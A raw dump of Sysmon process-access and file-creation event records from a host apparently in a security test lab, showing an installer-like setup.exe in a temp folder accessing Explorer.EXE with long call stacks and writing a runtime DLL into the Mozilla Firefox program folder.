setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll2021-01-18 13:59:52.239 10341000x800000000000000014585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
